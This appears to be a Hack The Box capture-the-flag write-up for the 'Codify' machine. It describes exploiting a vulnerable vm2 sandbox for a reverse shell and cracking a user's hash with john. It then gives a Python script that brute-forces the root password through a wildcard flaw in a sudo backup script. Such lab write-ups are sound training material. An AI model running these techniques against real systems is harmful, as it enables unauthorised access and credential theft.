CODIFY HTB

NMAP SCAN

Add codify.htb to /etc/hosts file

visiting the url shows our target is a Node.js editor

And yeah we can see it’s running vm2 version 3.9.16 which is vulnerable to Remote code execution CVE-2023-30547

so, a quick google search gave the exploit

we can easily gain reverse shell by modifying the execSync funtion and setting our netcat listener

PRIVILEGE ESCALATION

Trying to read the files in joshua directory and permission was denied

so, there’s a database file in the /var/www/contact directory which contains the user joshua password hash

And yeah i was able to crack the hash using john

john --wordlist=/usr/share/wordlists/rockyou.txt hash

we can now ssh into the box as joshua to get the user flag and proceed

running sudo -l shows we can run the mysql-backup script as sudo

and yeah we can guess or brute force the first password character followed by * to bypass the password prompt. and we can also brute force every character of the password till we find all characters of the password.

import string
import subprocess
all = list(string.ascii_letters + string.digits)
password = ""
found = False

while not found:
    for character in all:
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout

        if "Password confirmed!" in output:
            password += character
            print(password)
            break
    else:
        found = True

which i was able to get the root password and su as root

so, cat the root flag

Thanks.